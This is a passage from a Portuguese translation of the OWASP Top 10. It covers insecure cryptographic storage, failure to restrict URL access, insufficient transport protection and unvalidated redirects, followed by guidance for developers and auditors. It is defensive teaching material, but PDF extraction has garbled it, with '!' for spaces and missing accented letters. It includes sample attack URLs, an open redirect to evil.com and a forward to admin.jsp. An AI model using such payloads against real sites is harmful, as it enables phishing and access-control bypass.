expostos?!
Considere!
igualmente ! o!
prejuzo ! em!
termos ! da ! sua!
reputao.
Serei!vulnervel?
A!primeira!coisa!que!!necessrio!determinar!!saber!quais!so!os!dados!verdadeiramente!sensveis!que!
necessitem!de!ser!cifrados.!Por!exemplo,!palavrashchave,!cartes!de!crdito,!registos!mdicos,!e!informao!
pessoal!devem!ser!cifrados.!Para!todos!estes!dados,!!necessrio!assegurar:
1. Esto!cifrados!sempre!que!!armazenados!a!longo!prazo,!em!especial!em!cpias!de!segurana.
2. Apenas ! os ! utilizadores ! autorizados ! podem ! aceder ! a ! cpias ! decifradas ! dos ! dados ! (por ! exemplo,!
sistema!de!controlo!de!acesso!!ver!a!A4!e!a!A7).
3. Que!um!algoritmo!criptogrico!forte,!devidamente!padronizado!por!entidades!internacionais,!est!a!
ser!utilizado.
4. Que!foi!gerada!uma!chave!robusta,!protegida!contra!acessos!no!autorizados,!e!que!j!se!encontra!
planeada!a!futura!mudana!de!chave.
E!muitos! mais!para!ter ! acesso! a!um!conjunto ! mais !completo! de! problemas! a! serem! evitados,! veja! os!
requisitos!na!utilizao!da!Criptograia!do!ASVS!(V7).
Como!evitar!isto?
Todos!os!perigos!do!uso!inseguro!da!criptograia!esto!para!alm!do!mbito!deste!Top!10.!No!entanto,!
importa!realar!que!para!todos!os!dados!sensveis!que!necessitem!de!ser!cifrados,!convm!considerar!pelo!
menos!o!seguinte:
1. Considerando!todas!as!ameaas!das!quais!planeia!proteger!os!dados!(por!exemplo,!ataques!internos,!
utilizadores ! externos),! assegurehse! que! est! a! cifrar ! todos ! os! dados ! de! forma! a! que! os ! mesmos!
estejam!protegidos!destas!ameaas.
2. Garanta!que!as!cpias!de!segurana!so!cifradas,!mas!que!as!chaves!so!geridas!e!as!suas!cpias!
guardadas!de!uma!forma!separada.
3. Garanta ! que ! apenas ! so ! usados ! algoritmos ! apropriados ! e ! robustos, ! que ! seguem ! padres!
internacionais,!que!as!chaves!usadas!so!fortes!e!que!existem!polticas!de!gesto!das!mesmas.
4. Certiiquehse!que!as!palavrashchave!so!alvo!do!processamento!por!parte!de!um!algoritmo!de!gerao!
de!resumos,!obedecendo!a!padres!internacionais!e!que!so!usados!os!mecanismos!de!entropia!(salt)!
convenientes.
5. Garanta!que!todas!as!chaves!e!palavrashchave!esto!protegidas!contra!acessos!no!autorizados.
Exemplos!de!Cenrios!de!Ataque
Cenrio#1:!Uma!aplicao!cifra!os!dados!dos!cartes!de!crdito!numa!base!de!dados!para!prevenir!que!os!
mesmos ! sejam ! expostos ! aos ! utilizadores ! inais. ! No ! entanto, ! a ! base ! de ! dados ! est ! conigurada ! para!
automaticamente!decifrar!consultas!nas!colunas!de!cartes!de!crdito,!permitindo!que!uma!falha!de!injeo!
por !SQL!possa!listar !todos!os!cartes! de! crdito !em! claro.! O! sistema!deveria! ter!sido !conigurado !para!
permitir!que!apenas!aplicaes!de!backFend!pudessem!decifrar!esses!dados!e!no!as!aplicaes!web!de!frontF
end.
Cenrio#2: ! Uma ! cassete ! com ! uma ! cpia ! de ! segurana ! ! composta ! por ! registos ! mdicos ! devidamente!
cifrados,!no!entanto,!a!chave!de!cifra!est!armazenada!na!mesma!cpia!de!segurana.!A!copia!de!segurana !
extraviahse!e!nunca!chega!ao!centro!onde!deveria!icar!armazenada!e!protegida.
Cenrio#3:!A!palavra!chave!de!uma!base!de!dados!usa!funes!de!resumo,!sem!dados!de!entropia!(salt),!para!
armazenar!as!senhas!de!todos!os!utilizadores.!Uma!falha!no!carregamento!de!um!icheiro!permite!que!um!
atacante!possa!obter!o!icheiro!que!contem!as !palavrashchave.!Todos!os!resumos!gerados!sem!recurso!a!
informao!de!entropia,!podem!ser!descobertos!atravs!de!ataques!por!fora!bruta!em!apenas!4!semanas,!
enquanto!os!resumos!gerados!com!recurso!a!entropia!levaram!mais!de!3000!anos!a!ser!descobertos.
Referncias
OWASP
Para!um!conjunto!mais!completo!de!requisitos!e!problemas!a!serem!evitados!nesta!rea,!veja!o!documento!
de!requisitos!na!utilizao!da!Criptograia!do!ASVS!(V7).
!OWASP!Top!10h2007!on!Insecure!Cryptographic!Storage!
!ESAPI!Encryptor!API!
!OWASP!Development!Guide:!Chapter!Cryptography!
!OWASP!Code!Review!Guide:!Chapter!Cryptography!
Externa
!CWE!Entry!310!on!Cryptography!Issues!
!CWE!Entry!312!on!Cleartext!Storage!Sensitive!Information!
!CWE!Entry!326!on!Weak!Encryption!
A8!!Falha!na!Restrio!de!Acesso!a!URL
Agente!da!
Ameaa
Qualquer!
pessoa ! com!
acesso ! ! rede!
pode ! enviar!
um ! pedido!
para ! a ! sua!
aplicao.!
Podem!
utilizadores!
annimos!
aceder ! a!
pginas!
privadas ! ou!
os!
utilizadores!
regulares!
podem!aceder!
a!pginas!com!
privilgios!
especiais?
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
FCIL
POUCO!COMUM
MDIO
MODERADO
Sendo!o!atacante!
um ! utilizador!
autorizado ! do!
sistema ! pode!
alterar ! a ! URL!
para!uma!pgina!
com ! privilgios.!
! o ! acesso!
concedido? ! Os!
utilizadores!
annimos!
podem ! aceder ! a!
pginas!privadas!
que!no!estejam!
protegidas.
As!aplicaes!nem!protegem!os!
pedidos ! de ! pginas!
convenientemente.!Por!vezes,!a!
proteo ! do ! URL ! ! gerida!
atravs ! de ! conigurao!
podendo ! o ! sistema ! estar ! mal!
conigurado. ! Por ! vezes ! os!
programadores!esquecemhse!de!
efetuar ! as ! validaes!
apropriadas!no!cdigo.
A!deteo!destas!falhas!!fcil.!A!
parte!dicil!est!em!identiicar!
que ! pginas ! (URLs) ! esto!
vulnerveis!a!ataques.
Tais ! falhas!
permitem ! aos!
atacantes!aceder!
a!
funcionalidades!
no ! autorizadas.!
As ! funes ! de!
administrao!
so!o!alvo!chave!
neste ! tipo ! de!
ataque.
Impactos!de!
Negcio
Considere ! o!
valor
!
de!
negcio ! das!
funes!
expostas ! e ! os!
dados ! que!
estas!
processam.
Considere ! o!
impacto!na!sua!
reputao ! caso!
estas!
vulnerabilidah
des ! se ! venham!
a
!
tornar!
publicas.
Serei!vulnervel?
A!melhor!forma!de!saber!se!uma!aplicao!falha!na!restrio!de!acesso!a!um!URL!consiste!em!veriicar!todas!
as!pginas.!Considere!para!cada!uma!das!pginas!se!esta!!suposto!ser!publica!ou!privada.!Se!for!uma!pgina!
privada:
1. Para!aceder!!pgina!!requerida!autenticao?
2. ! suposto ! esta! estar !acessvel! a! qualquer ! utilizador ! autenticado? !Se! no,! ! ento ! realizada! uma !
veriicao!da!autenticao!para!assegurar!que!o!utilizador!tem!permisses!para!aceder!!pgina?
Frequentemente!os!mecanismos!de!segurana!externa!fornecem!veriicao!de!autenticao!e!autorizao!
para!aceder!!pgina.!Veriique!se!estes!esto!conigurados!adequadamente!para!cada!pgina.!Se!for!utilizada!
proteo!ao!nvel!do!cdigo!fonte,!veriique!que!a!mesma!est!em!todas!as!pginas!que!o!requerem.!Os!testes!
de!penetrao!podem!tambm!ajudar!veriicar!se!a!proteo!adequada!est!ativa.
Como!evitar!isto?
A!preveno!contra!o!acesso!no!autorizado!a!um!URL!requer!a!seleo!de!uma!abordagem!que!permita!
solicitar!a!autenticao!adequada!em!cada!pgina.!Frequentemente,!tal!proteo!!fornecida!por!uma!ou!mais!
componentes ! externas ! ao ! cdigo ! da ! aplicao. ! Independentemente ! do(s) ! mecanismo(s) ! fazemhse ! as!

seguintes!recomendaes:
1. As!polticas!de!autenticao!e!autorizao!devem!ser!baseadas!em!papis/peris,!para!minimizar!o!
esforo!necessrio!de!manuteno!dos!mesmos.
2. As ! polticas ! devem ! poder ! ser ! parametrizadas ! e ! coniguradas ! de ! forma ! a ! evitar ! que ! as ! mesmas!
estejam!codiicadas!diretamente!nas!aplicaes!e!com!pouca!lexibilidade.
3. Os!mecanismos!validao,!por!omisso,!devero!negar!todos!os!acessos,!requerendo!aos!utilizadores!
atribuies!explicitas!e!papis/peris!adequados!para!aceder!a!qualquer!pgina.
4. Se!a!pgina!estiver!integrada!num!luxo!de!trabalho!complexo!devehse!veriicar!se!todas!as!condies!
esto!num!estado!apropriado!para!permitir!o!acesso.
O ! atacante ! pode ! simplesmente ! forar ! a ! navegao ! dos ! URLs ! alvo. ! Considere !os ! seguintes ! URLs ! que,!
supostamente,!requerem!autenticao.!Os!direitos!de!administrao!so!tambm!necessrios!para!aceder!!
pgina!admin_getappInfo.
http://example.com/app/getappInfo!
http://example.com/app/admin_getappInfo
Se!o!atacante!no!estiver!autenticado!e!se!o!acesso!a!ambas!as!pginas!for!atribudo,!ento!!permitido!o!
acesso!no!autorizado.!Se!a!um!utilizador!autenticado!que!no!seja!administrador!!permitido!aceder!!
pgina!admin_getappInfo!tal!!considerado!uma!falha!podendo!dar!ao!atacante!acesso!a!mais!pginas!de!
administrao!mal!protegidas.!
Tais ! falhas ! so ! frequentemente ! introduzidas ! quando ! existem ! ligaes ! e ! botes ! que ! so ! simplesmente!
escondidos!a!utilizadores!no!autorizados,!no!entanto!a!aplicao!falha!na!proteo!das!pginas!a!que!os!
mesmos!se!referem.
Referncias
OWASP
!OWASP!Top!10h2007!on!Failure!to!Restrict!URL!Access!
!ESAPI!Access!Control!API!
!OWASP!Development!Guide:!Chapter!on!Authorization!!
!OWASP!Testing!Guide:!Testing!for!Path!Traversal!!
!OWASP!Article!on!Forced!Browsing!.!
Para!um!conjunto!mais!completo!de!requisitos!de!controlo!de!acesso,!veja!os !requisitos!para!controlo!de!
acesso!no!ASVS!(V4).
Externas
!CWE!Entry!285!on!Improper!Access!Control!(Authorization)!
A9!ZProteo!Insuciente!da!Camada!de!
Transporte
Agente!da!
Ameaa
Considere!
algum ! que!
quer!
monitorizar ! o!
trfego ! de!
rede!dos!seus!
utilizadores.!
Se!a!aplicao!
est
!
na!
Internet,!
quem ! sabe!
como ! os ! seus!
utilizadores!
lhe ! acedem.!
No
!
se!
esquea ! das!
ligaes ! de!
backFend.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
DIFCIL
COMUM
FCIL
MODERADO
Monitorizar ! o!
trfego ! dos!
utilizadores ! na!
rede ! pode ! ser!
dicil, ! mas ! na!
maior ! parte ! das!
vezes ! ! fcil. ! A!
principal!
diiculdade!
reside
!
na!
monitorizao!
do ! trfego ! de!
rede ! apropriado!
enquanto ! os!
utilizadores!
acedem ! ao!
endereo!
vulnervel.
As ! aplicaes ! frequentemente!
no!protegem!o!trfego!de!rede.!
Podem!utilizar!SSL/TLS!durante!
a ! autenticao, ! mas ! no ! no!
restante, ! expondo ! dados ! e ! IDs!
de!sesso!a!possvel!interceo.!
Certiicados ! mal ! conigurados!
ou ! expirados ! podem ! tambm!
ser!utilizados.
Detetar ! falhas ! bsicas ! ! fcil.!
Basta ! observar ! o ! trfego ! de!
rede ! do ! endereo. ! Falhas ! mais!
subtis ! requerem ! inspeo ! da!
arquitetura ! da ! aplicao ! e ! da!
conigurao!do!servidor.
Estas ! falhas!
expem ! dados!
de!utilizadores!e!
podem ! originar!
roubos
!
de!
contas. ! Se ! uma!
conta
!
de!
administrao!
for!
comprometida,!
todo ! o ! endereo!
pode
!
ser!
exposto. ! Ms!
coniguraes!do!
SSL ! podem!
tambm ! facilitar!
ataques ! de!
MITM ! (Man ! In!
The ! Middle) ! e!
phishing.
Impactos!de!
Negcio
Considere ! o!
valor
!
de!
negcio ! dos!
dados!expostos!
nos ! canais ! de!
comunicao!
em ! termos ! de!
necessidade ! de!
conidencialih
dade
!
e!
integridade!e!a!
necessidade ! de!
autenticar!
ambas ! as!
partes.
Serei!vulnervel?
A!melhor!maneira!de!descobrir!se!uma!aplicao!possui!proteo!suiciente!da!camada!de!transporte!!
veriicar!se:
1. !utilizado!SSL!para!proteger!todo!o!trfego!relacionado!com!autenticaes.
2. !utilizado!SSL!para!todos!os!recursos!em!todas!as!pginas!privadas!e!servios.!Isto!protege!todos!os!
dados!e!smbolos!de!sesso!que!so!trocados.!A!utilizao!de!contedo!misto!numa!pgina!(contedo!
SSL ! e ! no ! SSL) ! deve ! ser ! evitado ! dado ! que ! poder ! causar ! avisos ! no !navegador, ! expondo ! o!
identiicador!de!sesso!do!utilizador.
3. Apenas!algoritmos!robustos!so!suportados.
4. Todos!os!cookies!de!sesso!possuem!a!opo!'secure'!para!que!o!navegador!nunca!os!transmita!sem!
os!cifrar!adequadamente.
5. O!certiicado!do!servidor!!legtimo!e!est!devidamente!conigurado!para!o!servidor!em!causa.!Isto!
inclui!ser!emitido!por!um!emissor!autorizado,!no!estar!expirado,!no!ter!sido!revogado!e!mapear!
todos!os!domnios!que!o!endereo!utiliza.
Como!se!prevenir?
Fornecer!uma!proteo!apropriada!da!camada!de!transporte!pode!afetar!a!arquitetura!do!prprio!stio!web.!
!mais!fcil!usar!o!SSL!em!todo!o!stio.!Devido!a!razes!de!desempenho,!alguns!stios!apenas!utilizam!SSL!em !
pginas ! privadas. ! Outros ! utilizam ! SSL ! apenas ! em ! pginas ! crticas, ! no ! entanto ! isto ! pode ! expor!
identiicadores!de!sesso!assim!como!outros!dados!sensveis.!No!mnimo!dever!ser!feito!o!seguinte:
1. Solicitar ! SSL ! para ! todas ! as ! pginas ! sensveis. ! Pedidos ! nohSSL ! para ! estas ! pginas ! devero ! ser!
redirecionados!para!a!pgina!SSL.
2. Colocar!a!opo!'secure'!em!todos!os!cookies!sensveis.
3. Conigurar!o!fornecedor!SSL!para!apenas!suportar!algoritmos!robustos!(por!exemplo,!compatveis!
com!FIPS!140h2).
4. Assegurar!que!o!certiicado!!vlido,!no!expirado,!no!revogado,!e!que!mapeia!todos!os!domnios!
utilizados!pelo!stio!web.
5. Outras!ligaes,!assim!como!as!de!backFend,!devem!igualmente!utilizar!SSL!ou!outras!tecnologias!de!
cifra.!
Cenrio#1:!O!stio!web!simplesmente!no!utiliza!SSL!para!todas!as!pginas!que!requerem!autenticao.!O!
atacante!simplesmente!monitoriza!o!trfego!de!rede!(tal!como!uma!rede!sem!ios!aberta!ou!a!rede!de!cabo!do!
seu!vizinho)!e!observa!o!cookie!de!sesso!de!uma!vtima!autenticada.!O!atacante!utiliza!a!informao!deste!
cookie!e!rouba!a!sesso!do!utilizador!legtimo.
Cenrio#2: ! Um ! stio ! possui ! um ! certiicado ! SSL ! mal ! conigurado ! que ! causa ! avisos ! do !navegador! aos!
utilizadores.!Os!utilizadores!tm!que!aceitar!os!avisos!para!continuar!a!utilizar!o!stio.!Isto!faz!com!que!os!
utilizadores!se!habituem!a!tais!avisos.!Os!ataques!de!phishing!ao!stio!podero!enganar!os!clientes!a!aceder!a!
um!stio!semelhante,!o!qual!no!possui!um!certiicado!vlido,!gerando!avisos!de !navegador! semelhantes.!
Como!as!vtimas!esto!habituadas!a!tais!avisos,!estas!procedem!normalmente!e!utilizam!o!stio!de!phishing,!
fornecendo!palavrashchave!e!outros!dados!privados.
Cenrio#3:!Um!stio!utiliza!simplesmente!ODBC/JDBC!para!ligao!!base!de!dados,!no!se!apercebendo!que!
todo!o!trfego!!!legvel.
Referncias
OWASP
Para!um!conjunto!mais!completo!de!requisitos!e!problemas!a!evitar!nesta!rea,!ver!o!documento!ASVS!sobre!
os!requisitos!na!segurana!das!comunicaes!(V10).
!OWASP!Transport!Layer!Protection!Cheat!Sheet!
!OWASP!Top!10h2007!on!Insecure!Communications!
!OWASP!Development!Guide:!Chapter!on!Cryptography!
!OWASP!Testing!Guide:!Chapter!on!SSL/TLS!TestingExternal!
Externas
!CWE!Entry!319!on!CleartextTransmission!of!Sensitive!Information!
!SSL!Labs!Server!Test!
!Deinition!of!FIPS!140h2!Cryptographic!Standard!!!!How!
A10!Z!Redirecionamentos!e!Encaminhamentos!
Invlidos!
Agente!da!
Ameaa
Considere!
uma!qualquer!
entidade ! que!
pode ! enganar!
os
!
seus!
utilizadores!
na ! submisso!
de!um!pedido!
ao
!
seu!
endereo!
web.!
Qualquer!stio!
web ! ou ! fonte!
de ! HTML ! que!
os!
utilizadores!
usem, ! poder!
provocar!
estes!
problemas.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
MDIO
POUCO!COMUM
FCIL
MODERADO
Os ! atacantes!
apontam ! para!
um ! redirecionah
mento!invlido!e!
iludem
!
as!
vtimas!para!que!
estas
!
os!
selecionem. ! As!
vtimas ! esto!
mais ! propensas!
a!selecionar!essa!
ligao, ! desde!
que ! a ! mesma!
seja ! para ! um!
endereo ! vlido!
e ! verdadeiro. ! O!
atacante ! ataca!
encaminhah
mentos!
inseguros ! para!
tentar!contornar!
as ! veriicaes!
de!segurana.
As ! aplicaes ! redirecionam!
frequentemente!os! utilizadores!
para!outras!pginas!ou!utilizam!
encaminhamentos ! internos ! de!
uma!maneira!similar.!Por!vezes!
a!pgina!destino!!especiicada!
atravs ! de ! um ! parmetro ! que!
no ! ! validado, ! permitindo!
assim ! que ! um ! atacante ! possa!
escolher!a!pgina!de!destino.
Detetar !redirecionamentos !que!
no ! so ! validados ! ! simples.!
Basta ! procurar ! por!
redirecionamentos ! onde ! voc!
pode ! deinir ! o ! URL ! por!
completo.!Os!encaminhamentos!
no!validados!so!mais!diceis,!
uma ! vez ! que ! eles ! possuem!
como!alvo!pginas!internas.
Tais!redirecionah
mentos ! podem!
tentar ! instalar!
malware!
ou!
podem ! tentar!
enganar ! as!
vitimas ! com ! o!
intuito ! de ! as!
levar ! a ! divulgar!
palavrashchave!
ou
!
outras!
informaes!
sensveis. ! Os!
encaminhah
mentos!
inseguros!
podem ! permitir!
contornar ! os!
controlos ! de!
acesso.
Impactos!de!
Negcio
Considerar ! o!
valor
!
do!
negcio ! de!
manter ! a!
coniana ! dos!
seus!
utilizadores.!
E!se!eles!forem!
infetados ! por!
malware?!
E ! se ! os!
atacantes!
puderem!
aceder
!
a!
funes ! que!
eram ! supostas!
ser ! apenas!
internas?
Serei!vulnervel?
A ! melhor ! forma ! de ! veriicar ! se ! alguma ! aplicao ! possui ! redirecionamentos ! ou ! encaminhamento ! no!
validados!:
1. Rever ! o ! cdigo ! para ! todos ! os ! usos ! de ! redirecionamentos ! ou ! encaminhamentos ! (chamados ! de!
transferncias!em!.NET).!Para!cada!utilizao,!identiique!se!o!URL!de!destino!faz!parte!de!algum!
valor!de!um!parmetro.!Se!assim!for,!veriique!se!o(s)!parmetro(s)!so!validados!para!apenas!conter!
destinos!permitidos!ou!elementos!de!um!destino.
2. Igualmente,!percorra!o!stio!para!veriicar!se!o!mesmo!gera!algum!redirecionamento!(cdigos!de!
resposta ! HTTP ! 300h307, ! tipicamente ! o ! 302). ! Olhe ! para ! os ! parmetros ! fornecidos ! antes ! do!
redirecionamento!para!veriicar!se!eles!parecem!ser!um!URL!de!destino!ou!apenas!uma!parte!desse!
URL.!Se!sim,!altere!o!URL!de!destino!e!observe!se!o!stio!o!redireciona!para!esse!novo!destino.
3. Se!o!cdigo!no!estiver!disponvel,!veriique!todos!os!parmetros!para!ver!se!eles!parecem!ser!parte!
dum!URL!de!destino,!dum!redirecionamento!ou!encaminhamento,!e!teste!todos!que!o!sejam.
Como!se!prevenir?
O!uso!seguro!de!redirecionamentos!e!encaminhamentos!podem!ser!feitos!de!vrias!formas:
1. Simplesmente!evitando!o!uso!de!redirecionamentos!e!encaminhamentos.
2. Se! tiverem! mesmo ! que! ser ! usados,! no ! envolva ! parmetros ! do ! utilizador ! no! clculo ! do ! URL! de!
destino.!
3. Se!os!parmetros!de!destino!no!podem!ser!evitados,!tenha!certeza!de!fornecer!um!valor!vlido!e!
autorizado!para!o!utilizador.
Recomendahse!que!os!parmetros!de!destino!sejam!valores!mapeados!e!no!o!URL!real!ou!parte!dele!
e!que!o!cdigo!do!lado!do!servidor!traduza!este!mapeamento!para!o!URL!de!destino.
As!aplicaes!podem!usar!ESAPI!para!substituir!o!mtodo!sendRedirect()!para!se!certiicarem!de!que!
todos!os!destinos!do!redirecionamento!so!seguros.
Evitar!estas!falhas!!extremamente!importante,!pois!elas!so!os!alvos!favoritos!de!phishers!tentando!obter!a!
coniana!do!utilizador.
Cenrio#1:!A!aplicao!possui!uma!pgina!chamada!redirect.jsp!que!leva!apenas!um!parmetro!chamado !
url.!O!atacante!cria!uma!URL!maliciosa!que!redireciona!os!utilizadores!para!um!endereo!Web!malicioso !
que!!usado!para!phishing!ou!instalar!malware.
http://www.example.com/redirect.jsp?url=evil.com
Cenrio#2:!A!aplicao!usa!encaminhamento!para!efetuar!a!ligao!de!pedidos!entre!diferentes!partes!de!um!
endereo.!Para!facilitar!isto,!algumas!pginas!usam!um!parmetro!para!indicar!para!onde!o!utilizador!deve!
ser!enviado!se!uma!determinada!transao!for!executada!com!sucesso.!Neste!caso,!o!atacante!cria!um!URL!
que!ir!passar!pela!aplicao!de!veriicao!do!controlo!de!acessos!e!em!seguida!ir!encaminhhlo!para!uma !
funo!administrativa!!qual!ele!normalmente!no!teria!acesso.
http://www.example.com/boring.jsp?fwd=admin.jsp
Referncias
OWASP
!OWASP!Article!on!Open!Redirects!
!ESAPI!Security!Wrapper!Response!sendRedirect()!method!
Externas
!CWE!Entry!601!on!Open!Redirects!
!WASC!Article!on!URL!Redirector!Abuse!
!Google!blog!article!on!the!dangers!of!open!redirects!
O!que!se!segue!para!os!programadores
Estabelecer!e!Usar!um!conjunto!comum!de!controlos!de!segurana
Quer!seja!novo!na!rea!da!segurana!aplicacional!para!a!web!ou!se!j!est!suicientemente!familiarizado!com !
estes!riscos,!a!tarefa!de!produzir!uma!aplicao!web!segura!ou!de!solucionar!os!problemas!numa!j!existente!
pode!ser!muito!dicil.!Se!tiver!que!gerir!um!conjunto!grande!de!aplicaes!web,!isto!pode!tornarhse!numa !
tarefa!dantesca.
Disponibilidade!de!muitos!recursos!OWASP!livres!e!abertos
Para ! ajudar ! as ! organizaes ! e ! os ! programadores ! a ! reduzirem ! os ! seus ! riscos ! aplicacionais ! duma ! forma!
eiciente,!a!OWASP!produziu!um!numeroso!conjunto!de!recursos!livres!e!abertos!que!podem!ser!usados!para!
fazer!face!aos!mltiplos!problemas!de!segurana!aplicacional!da!sua!organizao.!A!seguir!so!apresentados!
alguns!dos!muitos!recursos!que!a!OWASP!produziu!para!ajudar!as!organizaes!a!produzir!aplicaes!web!
seguras. ! Na ! pgina ! seguinte ! so ! apresentados ! alguns ! recursos ! OWASP ! adicionais ! que ! podem ! ajudar ! as!
organizaes!na!veriicao!da!segurana!das!suas!aplicaes!web.
Requisitos!de!
Segurana!
Aplicacional
Para ! desenvolver ! uma ! aplicao ! web !segura, ! deve ! deinir ! o ! seu ! prprio!
signiicado ! de ! segurana. ! A ! OWASP ! recomenda ! a ! utilizao ! da !Norma ! de!
Veriicao ! de ! Segurana ! Aplicacional ! da ! OWASP ! (ASVS), ! como ! um ! guia ! que!
deine!um!conjunto!de!requisitos!para!as!suas!aplicaes.!Se!subhcontratar!o!
desenvolvimento ! das ! suas ! aplicaes, ! considere ! a ! utilizao ! do !Anexo ! do!
Contrato!de!Software!Seguro.
Arquitetura!de!
Segurana!
Aplicacional
Ao ! invs ! de ! tentar ! encaixar ! a ! segurana ! nas ! suas ! aplicaes ! ! muito ! mais!

eiciente!planear!e!desenhar!essa!segurana!desde!o!inicio.!A!OWASP!recomenda!
a!consulta!do!Guia!do!Programador!da!OWASP!como!um!bom!ponto!de!partida!e!
que ! oferece ! suporte ! sobre ! a ! forma ! como ! se ! pode ! desenhar ! a ! segurana ! na!
aplicao!desde!o!inicio.!
Normalizao!de!
Controlos!de!
Segurana
Construir!controlos!de!segurana!que!sejam!simultaneamente!fortes!e!fceis!de!
usar!!extraordinariamente!dicil.!Oferecer!aos!programadores!um!conjunto!de!
controlos ! de ! segurana ! normalizados ! simpliica ! radicalmente ! o!
desenvolvimento! de!aplicaes! seguras.!A! OWASP! recomenda!a! utilizao ! do!
projeto!da!API!de!Segurana!Empresarial!da!OWASP!(ESAPI)!como!um!modelo!
de!uma!API!de!segurana!necessria!para!produzir!aplicaes!web!seguras.!A!
ESAPI!oferece!implementaes!de!referncia!em!linguagens!de!programao!to!
distintas!como!Java,!.Net,!PHP,!ASP!clssico,!Python!e!Cold!Fusion.
Ciclo!de!Vida!de!
Desenvolvimento!
Seguro
Para!melhorar!os!processos!de!organizao!no!desenvolvimento!deste!tipo!de!
aplicaes, ! a ! OWASP ! recomenda ! o !Modelo ! de ! Maturidade ! de ! Garantia ! do!
Software!(SAMM!!Software!Assurance!Maturity!Model)!da!OWASP.!Este!modelo!
ajuda ! as ! organizaes ! a ! formularem ! e ! implementarem ! estratgias ! para ! a!
segurana!do!software!que!so!mais!adequadas!para!os!riscos!especicos!que!a!
organizao!ter!que!enfrentar.
Educao!em!
O!Projeto
!
!!de!Educao!da!OWASP
!
!!oferece!materiais!de!formao!que!ajudam!a!
Segurana!
Aplicacional
treinar!e!formar!programadores!na!rea!da!segurana!aplicacional!web!e!que!
agregou!um!conjunto!alargado!de!Apresentaes!Educacionais!da!OWASP.!Para!
aprender! mais!sobre! as!vulnerabilidades!usando! casos!prticos,!tente!usar!o!
WebGoat.!Para!estar!sempre!atualizado!em!relao!aos!riscos!de!segurana!deve!
acompanhar ! alguns ! dos ! nossos ! muitos ! eventos, ! quer ! se ! trate ! de ! uma!
Conferncia ! OWASP ! AppSec, ! um ! Evento ! de ! Formao ! OWASP ! ou ! ainda ! uma!
reunio!de!um!dos!muitos!Captulos!OWASP!Locais!espalhados!pelo!Mundo.
Existem!ainda!um!conjunto!de!inmeros!recursos!adicionais!da!OWASP!para!utilizao.!Por!favor,!visite!a!
pgina!de!Projetos
!
!!da!OWASP
!
!!que!lista!todos!os!projetos!OWASP,!organizados!pela!qualidade!dos!resultados!
dos!mesmos!(Verso!Final,!Beta!ou!Alfa).!Muitos!dos!recursos!da!OWASP!esto!diretamente!disponveis!na!
nossa!Wiki!e!muitos!dos!documentos!da!OWASP!podem!ser!encomendados!numa!verso!em!papel.
O!que!se!segue!para!os!auditores
OrganizeZse
Para!veriicar!a!segurana!de!uma!aplicao!web!que!desenvolveu,!ou!de!uma!aplicao!cuja!aquisio!est!a !
considerar,!a!OWASP!recomenda!que!reveja!o!cdigohfonte!da!mesma!(caso!esteja!disponvel)!e!que!a!teste.!A!
OWASP!recomenda!uma!combinao!de!revises!de!segurana!do!cdigohfonte!e!de!testes!de!penetrao!
aplicacionais!sempre!que!tal!seja!possvel,!uma! vez!que! isso!permitir!obter!os!melhores!resultados! de!
ambas! as !tcnicas !uma! vez! que! estas ! so !complementares. ! As ! ferramentas! para! ajudar ! no ! processo !de!
veriicao ! podem ! melhorar ! o ! desempenho ! e ! a ! eiccia ! de ! um ! especialista ! neste ! tipo ! de ! anlise. ! As !
ferramentas!de!avaliao!da!OWASP!esto!concebidas!para!ajudarem!um!especialista!a!ser!mais!eicaz!ao !
invs!de!tentarem!simplesmente!automatizar!o!prprio!processo!de!anlise.!
Normalizar!o!Processo!de!Verigicao!da!Segurana!em!Aplicaes!Web :!para!ajudar!as!organizaes!a!
desenvolverem!avaliaes!de!segurana!em!aplicaes!web!que!sejam!consistentes!e!rigorosas,!a!OWASP!
produziu!uma!Norma!de!Veriicao!de!Segurana!Aplicacional!(Application!Security!Veriication!Standard!h !
ASVS).!Este!documento!deine!um!conjunto!mnimo!de!normas!de!veriicao!para!realizar!avaliaes!de!
segurana!em!aplicaes!web.!A!OWASP!recomenda!a!utilizao!do!ASVS!como!um!guio!no!apenas!para!o!
que!procurar!quando!se!veriica!a!segurana!de!uma!aplicao!web,!mas!indica!tambm!quais!as!tcnicas!
mais!apropriadas!a!usar!e!ajuda!na!deinio!e!seleo!do!nvel!de!rigor!aquando!da!veriicao!da!segurana!
das!mesmas.!A!OWASP!recomenda!igualmente!a!utilizao!do!ASVS!para!ajudar!na!deinio!e!seleo!de!
servios!de!veriicao!de!aplicaes!web!que!possam!ser!contratados!a!fornecedores!externos.
Conjunto!de!Ferramentas!de!Verigicao:!o !Projeto
!
!!! do!Live!CD!da!OWASP!! reuniu!algumas!das!melhores!
ferramentas!de!cdigo!aberto!de!segurana!num!ambiente!nico,!que!podem!ser!usadas!a!partir!de!um!CD!de!
arranque.!Os!programadores!web,!responsveis!pelos!testes!e!proissionais!de!segurana!podem!arrancar!os!
seus!sistemas!usando!este!Live!CD!tendo!de!imediato!o!acesso!a!um!conjunto!integrado!de!ferramentas!de!
veriicao!e!testes!de!segurana.!No!ser!necessria!qualquer!instalao!ou!conigurao!adicional!para!
usar!as!ferramentas!contidas!neste!CD.
Reviso!de!Cdigo
A!reviso!do!cdigo!fonte!!a!forma!mais!robusta!para!veriicar!a!segurana!de!uma!aplicao.!Os!testes!
apenas!podem!provar!que!uma!aplicao!!insegura.
Reviso! do! Cdigo: !Como ! complemento! ao !Guia! de! Programadores ! da! OWASP! e! ao !Guia! de! Testes !da!
OWASP,!a!OWASP!produziu!ainda!o!Guia!de!Reviso!de!Cdigo
!
!!!que!ajuda!os!programadores!e!os!especialistas!
em!segurana!aplicacional!a!perceberem!como!podem!rever!a!segurana!de!uma!aplicao!web!de!forma !
eicaz!e!eiciente!atravs!da!reviso!do!seu!cdigohfonte.!Existe!um!conjunto!de!problemas!de!segurana!em!
aplicaes!web,!tais!como!Falhas!de!Injeo,!que!so!facilmente!detetveis!atravs!de!revises!do!cdigo!
fonte!do!que!por!outros!testes!externos.
Ferramentas!de!Reviso!de!Cdigo:!A!OWASP!tem!vindo!a!realizar!um!trabalho!promissor!na!ajuda!que!
